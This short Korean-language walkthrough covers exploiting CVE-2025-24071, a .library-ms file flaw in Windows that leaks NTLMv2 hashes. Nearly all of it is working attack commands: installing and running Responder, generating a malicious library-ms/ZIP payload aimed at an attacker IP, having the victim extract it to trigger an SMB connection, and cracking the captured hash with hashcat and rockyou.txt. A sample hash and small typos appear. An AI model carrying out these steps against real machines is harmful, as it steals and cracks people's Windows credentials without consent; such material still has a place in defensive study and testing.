
CVE-2025-24071: .library-ms 파일을 통한 NTLMv2 해시 노출
sudo apt update && sudo apt install responder -y
Responder 시작
sudo responder -I eth0
필요한 Python 모듈 설치
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
이 명령은 다음 파일을 생성합니다: testpayload.library-ms testpayload.zip
testpayload.zip을 Windows 11 테스트 머신으로 전송합니다. Windows 파일 탐색기를 사용하여 ZIP을 추출합니다. 이로 인해 Windows가 SMB 경로에 액세스하려고 시도하며 NTLM 해시가 유출됩니다.
responder -I etho0

hash,txt 파일 생성
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
가장 일반적인 rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
